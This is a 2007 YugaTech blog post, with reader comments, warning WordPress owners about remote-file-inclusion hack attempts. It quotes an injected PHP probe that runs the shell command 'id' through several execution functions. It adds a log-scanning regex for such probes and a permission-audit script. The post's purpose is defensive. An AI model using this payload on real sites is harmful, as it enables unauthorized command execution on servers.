YugaTech | Philippines, Technology News & Reviews


Hack attack in progress

One of the ugliest things that could happen to a blog or a website is getting hacked. For a person like me who runs his own dedicated server, this is a daily pain in the neck. We get hack attacks every day, some by expert hackers but mostly by script kiddies who take scripts lying around somewhere and try to inject malicious code into your site, hoping to get access.

Since Friday, my blog has been targeted incessantly. You could be next! (Or you’ve already been, you just don’t know it yet.) So be wary.

One of the first signs of hack attempts can be detected through your error_logs. They’re usually found in the root folder of your site or the base directory of your blog. What they usually do is affix a script to your URL hoping to execute it. Here’s one script I found being injected into my PodPress plugin:


echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

Several people have encountered the same and have been successfully hacked. The script is uploaded somewhere else and is pulled in from the target site. Your error logs might display this as such:

[30-Jul-2007 08:17:57] PHP Warning: parse_url + the URL it’s testing for holes or vulnerabilities.
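
One way to pull these probes out of a log, as an added example that is not from the original post: it flags any request in which a query parameter's value is itself a remote URL, plain or percent-encoded, and counts hits per targeted script. The sample lines, plugin path and hosts are constructed placeholders, and the exact wording of real log lines may differ.

```shell
#!/bin/sh
# Added example: spot remote-file-inclusion probes in a web or PHP error log.
# A probe shows up as a request where some parameter's value is a remote URL.

# Query parameter whose value starts with http://, https:// or ftp://,
# written plainly or percent-encoded (%3A%2F%2F). Matched case-insensitively.
RFI_RE='[?&][^=&[:space:]]*=(https?|ftp)(:|%3a)(/|%2f)(/|%2f)'

# Read a log on stdin, print only the suspicious lines.
rfi_probes() {
    grep -Ei "$RFI_RE"
}

# Read a log on stdin, print "count path" for each script being probed,
# most-targeted first.
rfi_targets() {
    rfi_probes |
        sed -E 's/.*[( "](\/[^?[:space:]]*)\?.*/\1/' |
        sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Constructed sample log (not real traffic): placeholder plugin paths and
# .invalid hosts. Lines 1, 2 and 4 are probes; lines 3 and 5 are normal.
sample_log() {
    cat <<'EOF'
[30-Jul-2007 08:17:57] PHP Warning: parse_url(/wp-content/plugins/example-plugin/page.php?path=http://files.example.invalid/a.txt)
[30-Jul-2007 08:18:02] PHP Warning: parse_url(/wp-content/plugins/example-plugin/page.php?path=HTTP%3A%2F%2Ffiles.example.invalid%2Fa.txt)
[30-Jul-2007 08:19:40] PHP Notice: Undefined index: page in /var/www/index.php on line 12
[30-Jul-2007 08:21:13] PHP Warning: parse_url(/index.php?id=4&inc=ftp://files.example.invalid/b.txt)
[30-Jul-2007 08:22:00] PHP Warning: parse_url(/index.php?ref=/about/)
EOF
}

# With a file argument, scan that file; otherwise only define the functions.
if [ "$#" -gt 0 ]; then rfi_targets < "$1"; fi
```

A legitimate parameter that carries a URL (a redirect target, for instance) matches too, so treat hits as leads to review rather than confirmed attacks.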

So, be careful. Always check your files for open permissions (+777) and fix them. Upgrade to the latest stable version of WordPress or any software you’re using. Check all your plugins if they need upgrades too. It’s usually the plugins (that we don’t bother to check) where we least expect them to attack.
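
The permission check above as a script, added here as an example and not part of the original post: it lists everything under a site directory that is world-writable (777 included) and can reset it. The 644 for files is the value suggested in the comments on this post; 755 for directories is an assumption, since directories need the execute bit to be entered.

```shell
#!/bin/sh
# Added example: find world-writable entries (such as mode 777) under a web
# root and reset them. Function names and modes for directories are this
# example's own choices, not taken from WordPress or the original post.

# Print every regular file or directory under $1 that "other" can write to.
# Symlinks are not matched by -type f / -type d, so they are left alone.
audit_perms() {
    find "$1" \( -type f -o -type d \) -perm -0002 -print | sort
}

# Reset world-writable files to 644 and directories to 755 under $1.
# Anything the application documents as needing another mode has to be
# re-applied by hand afterwards.
fix_perms() {
    find "$1" -type f -perm -0002 -exec chmod 644 {} +
    find "$1" -type d -perm -0002 -exec chmod 755 {} +
}

# Usage: script.sh /path/to/site        -> report only
#        script.sh /path/to/site --fix  -> report, then fix
if [ "$#" -gt 0 ]; then
    audit_perms "$1"
    if [ "${2:-}" = "--fix" ]; then fix_perms "$1"; fi
fi
```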


17 Responses to “Hack attack in progress”


  1. Bob Maguire Jul 30th, 2007 at 9:11 am

    Yes, a very important warning indeed. If I could just add emphasis on the “upgrade to the latest stable version” part, that’s how I got bitten. Actually, the provider of the software that had the vulnerability in it, discovered the problem and quickly provided a fix on the mailing list, of which I was a member. However, I put it on my “to do” list where I promptly forgot about it and never applied the fix, only to get hacked a month or so later.

    So yes, keep your software and plug-ins up to date!

    bob

  2. Dorene Jul 30th, 2007 at 10:29 am

    What should be the permission code if not 777?

  3. journeyist Jul 30th, 2007 at 11:34 am

    Does this mean a blog is LESS vulnerable if it has no plugins?

    …and just curious, is this vulnerability issue via plugins also present when using other blogging platforms, like blogspot for instance?

  4. yuga Jul 30th, 2007 at 11:38 am

    @ Bob - lessons learned. ;)

    @ Dorene - I suggest 644, unless otherwise specified by the app.

    @ journeyist - yup, less is more secure. If you’re on BlogSpot, LiveJournal or other hosted sites, less worry for you since it’s the provider that takes care of it. Plugins pose more threat because they come from varying sources.

  5. skiper Jul 30th, 2007 at 12:25 pm

    Yuga, I encountered an error on your site last Friday and I blogged about it.

    Check this out. This might help.
    http://skiper.pinoyanswers.com/yugatechs-blog-encountered-internal-server-error/

  6. yuga Jul 30th, 2007 at 12:28 pm

    skiper, yup dude, read about it last Saturday. Wasn’t able to comment because I think it was closed. But thanks for the info. :)

  7. jozzua Jul 30th, 2007 at 3:43 pm

    Annoying.. hack attacks. Good luck with it Abe.

  8. sparks Jul 30th, 2007 at 4:48 pm

    This post is scary. :(

  9. Manuel Viloria Jul 30th, 2007 at 6:55 pm

    I’ve seen that attempted on sites with the Amember membership script. It’s as if someone is trying to get hold of usernames and passwords so that they can log into the members-only folder.

  10. jhay Jul 30th, 2007 at 8:51 pm

    I think I was hacked before when the Ploghost server that hosted the .com.ph blogs went haywire just before the MOA Blogger meetup.

    My blog’s DB was wiped clean! Good thing I had backups on standby, otherwise, I’d have gone insane! ;)
